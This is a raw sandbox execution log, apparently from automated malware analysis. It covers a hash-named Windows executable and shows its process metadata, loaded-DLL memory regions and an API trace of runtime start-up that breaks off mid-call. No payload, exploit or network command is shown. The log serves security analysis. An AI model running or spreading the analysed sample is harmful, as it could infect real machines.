# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 14.08.2018 08:32:09.320 Process: id = "1" image_name = "1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" filename = "c:\\users\\eebsym5\\desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" page_root = "0x7ea16640" os_pid = "0xa44" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 138 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 139 start_va = 0x400000 end_va = 0x44ffff entry_point = 0x400000 region_type = mapped_file name = "1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" filename = "\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe") Region: id = 140 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 141 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 142 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 143 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 144 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 145 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 146 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 147 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 148 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 149 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 150 start_va = 0x71f50000 end_va = 0x71f54fff entry_point = 0x71f50000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 151 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 152 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 153 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 154 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 155 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 156 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 157 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 158 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 159 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 160 start_va = 0x450000 end_va = 0x517fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 161 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 162 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 163 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 164 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 165 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 166 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 167 start_va = 0x1230000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 168 start_va = 0x1d0000 end_va = 0x21afff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 169 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 170 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 171 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 172 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 173 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 174 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 175 start_va = 0x1230000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 176 start_va = 0x1360000 end_va = 0x136ffff entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 177 start_va = 0x748d0000 end_va = 0x748d8fff entry_point = 0x748d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 178 start_va = 0x6f920000 end_va = 0x6f9defff entry_point = 0x6f920000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 179 start_va = 0x340000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 180 start_va = 0x71f10000 end_va = 0x71f12fff entry_point = 0x71f10000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 181 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 182 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 183 start_va = 0x6fd40000 end_va = 0x6fd97fff entry_point = 0x6fd40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 184 start_va = 0x6fcf0000 end_va = 0x6fd3efff entry_point = 0x6fcf0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 185 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 186 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 187 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 188 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 189 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 190 start_va = 0x1e0000 end_va = 0x21bfff entry_point = 0x1e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 191 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 192 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 193 start_va = 0x1e0000 end_va = 0x1e6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 194 start_va = 0x1f0000 end_va = 0x1f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 195 start_va = 0x340000 end_va = 0x396fff entry_point = 0x340000 region_type = mapped_file name = "ntdll.dll.mui" filename = "\\Windows\\System32\\en-US\\ntdll.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ntdll.dll.mui") Region: id = 196 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 197 start_va = 0x752b0000 end_va = 0x752cafff entry_point = 0x752b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 198 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 199 start_va = 0x1640000 end_va = 0x177ffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 200 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 201 start_va = 0x1640000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 202 start_va = 0x1740000 end_va = 0x177ffff entry_point = 0x0 region_type = private name = "private_0x0000000001740000" filename = "" Region: id = 203 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 204 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 205 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 206 start_va = 0x1640000 end_va = 0x173ffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 207 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 208 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 209 start_va = 0x1810000 end_va = 0x184ffff entry_point = 0x0 region_type = private name = "private_0x0000000001810000" filename = "" Region: id = 210 start_va = 0x1850000 end_va = 0x192efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001850000" filename = "" Region: id = 211 start_va = 0x74220000 end_va = 0x74314fff entry_point = 0x74220000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 212 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 213 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 214 start_va = 0x74360000 end_va = 0x744fdfff entry_point = 0x74360000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 215 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 216 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 217 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 218 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 219 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 220 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 221 start_va = 0x3a0000 end_va = 0x3a3fff entry_point = 0x3a0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 222 start_va = 0x3c0000 end_va = 0x3defff entry_point = 0x3c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001a.db" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db") Region: id = 223 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 224 start_va = 0x3f0000 end_va = 0x3f3fff entry_point = 0x3f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 225 start_va = 0x1230000 end_va = 0x125ffff entry_point = 0x1230000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 226 start_va = 0x1260000 end_va = 0x12c5fff entry_point = 0x1260000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 227 start_va = 0x12d0000 end_va = 0x12d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012d0000" filename = "" Region: id = 228 start_va = 0x12f0000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 229 start_va = 0x1780000 end_va = 0x17fffff entry_point = 0x0 region_type = private name = "private_0x0000000001780000" filename = "" Region: id = 230 start_va = 0x1930000 end_va = 0x1d22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001930000" filename = "" Region: id = 231 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 232 start_va = 0x1d30000 end_va = 0x1e2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 233 start_va = 0x75400000 end_va = 0x75411fff entry_point = 0x75400000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 234 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x75590000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 235 start_va = 0x764b0000 end_va = 0x7664cfff entry_point = 0x764b0000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 236 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 492 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 493 start_va = 0x1e30000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 494 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 495 start_va = 0x70550000 end_va = 0x70555fff entry_point = 0x70550000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 502 start_va = 0x73d80000 end_va = 0x73e7afff entry_point = 0x73d80000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 575 start_va = 0x12e0000 end_va = 0x12e0fff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 576 start_va = 0x1330000 end_va = 0x1330fff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Thread: id = 1 os_tid = 0xa48 [0036.352] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x5d509230, dwHighDateTime=0x1d433a9)) [0036.352] GetCurrentProcessId () returned 0xa44 [0036.352] GetCurrentThreadId () returned 0xa48 [0036.352] GetTickCount () returned 0x1a14d [0036.352] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=11585298019) returned 1 [0036.352] GetStartupInfoA (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.354] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.354] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0036.354] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0036.354] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0036.354] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0036.355] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.355] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.356] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.356] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.356] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.356] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.357] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.358] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.358] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.358] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.359] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.359] GetProcAddress (hModule=0x76910000, lpProcName="DecodePointer") returned 0x7728cd10 [0036.360] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.360] GetProcAddress (hModule=0x76910000, lpProcName="DecodePointer") returned 0x7728cd10 [0036.360] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0036.360] GetProcAddress (hModule=0x76910000, lpProcName="EncodePointer") returned 0x7728a295 [0036.360] GetProcAddress (hModule=0x76910000, lpProcName="DecodePointer") returned 0x7728cd10 [0036.361] GetCurrentThreadId () returned 0xa48 [0036.361] GetStartupInfoA (in: lpStartupInfo=0x12fea4 | out: lpStartupInfo=0x12fea4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0036.361] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0036.361] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0036.361] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0036.361] SetHandleCount (uNumber=0x20) returned 0x20 [0036.361] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe\" " [0036.361] GetEnvironmentStringsW () returned 0x2514c0* [0036.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0036.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13611f8, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0036.361] FreeEnvironmentStringsW (penv=0x2514c0) returned 1 [0036.361] GetLastError () returned 0x0 [0036.362] SetLastError (dwErrCode=0x0) [0036.362] GetLastError () returned 0x0 [0036.362] SetLastError (dwErrCode=0x0) [0036.362] GetLastError () returned 0x0 [0036.362] SetLastError (dwErrCode=0x0) [0036.362] GetACP () returned 0x4e4 [0036.362] GetLastError () returned 0x0 [0036.362] SetLastError (dwErrCode=0x0) [0036.362] IsValidCodePage (CodePage=0x4e4) returned 1 [0036.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0036.362] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0036.362] GetLastError () returned 0x0 [0036.362] SetLastError (dwErrCode=0x0) [0036.362] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x12f8e0 | out: lpCharType=0x12f8e0) returned 1 [0036.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, 